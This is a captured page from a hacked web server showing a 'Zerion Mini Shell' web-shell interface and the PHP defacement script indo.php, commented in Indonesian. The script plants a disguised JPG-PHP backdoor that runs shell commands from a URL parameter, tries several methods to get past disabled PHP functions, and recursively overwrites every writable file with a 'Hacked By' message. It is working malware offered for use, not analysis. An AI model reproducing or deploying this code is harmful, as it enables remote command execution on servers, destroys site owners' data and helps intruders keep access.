%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/var/tmp/
Upload File :
Create Path :
Current File : //proc/self/root/var/tmp/indo.php

<?php
// indo.pHp7 - Bypass upload filter & mass file replacement with JPG bypass
error_reporting(0);
header("Content-Type: text/plain");

$target_file = "rius.txt";
$php_jpg_file = "indo.jpg.php"; // File PHP dengan bypass JPG

// Membuat target file jika belum ada
if (!file_exists($target_file)) {
    file_put_contents($target_file, "Hacked By Mr.Rius // Cyber Sederhana Team\n");
}

// Membuat file PHP dengan bypass header JPG
if (!file_exists($php_jpg_file)) {
    $jpg_header = "\xFF\xD8\xFF\xE0"; // Header JPG
    $php_code = '<?php echo "JPG-PHP Bypass Active\n"; if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';
    file_put_contents($php_jpg_file, $jpg_header . $php_code);
    echo "[+] Created JPG-PHP bypass file: $php_jpg_file\n";
}

// Bypass fungsi disable_functions (jika aktif)
function bypass_disabled_functions($cmd) {
    if (function_exists('shell_exec')) {
        return shell_exec($cmd);
    } elseif (function_exists('system')) {
        system($cmd);
    } elseif (function_exists('passthru')) {
        passthru($cmd);
    } elseif (function_exists('exec')) {
        exec($cmd, $output);
        return implode("\n", $output);
    } elseif (is_writable('/tmp') && function_exists('proc_open')) {
        $tmp_file = '/tmp/' . md5(rand());
        file_put_contents($tmp_file, "<?php echo shell_exec('$cmd'); ?>");
        include($tmp_file);
        unlink($tmp_file);
    }
}

// Ganti semua file dengan target (rekursif)
function replaceAllFiles($dir, $target) {
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file == "." || $file == "..") continue;
        $path = $dir . '/' . $file;
        if (is_dir($path)) {
            replaceAllFiles($path, $target); // Rekursif subfolder
        } elseif (is_writable($path) && $file != basename(__FILE__)) {
            // Bypass untuk file gambar - tambahkan header JPG jika file PHP
            if (preg_match('/\.php$/i', $path)) {
                $jpg_header = "\xFF\xD8\xFF\xE0";
                $content = $jpg_header . file_get_contents($target);
                file_put_contents($path, $content);
                echo "[+] Replaced with JPG bypass: $path\n";
            } else {
                file_put_contents($path, file_get_contents($target));
                echo "[+] Replaced: $path\n";
            }
        }
    }
}

// Eksekusi
replaceAllFiles(".", $target_file);

// Bonus: Coba bypass disable_functions (opsional)
if (isset($_GET['cmd'])) {
    echo "[CMD] " . bypass_disabled_functions($_GET['cmd']);
}

echo "Done! All files replaced with $target_file and JPG-PHP bypass created";
?>

Zerion Mini Shell 1.0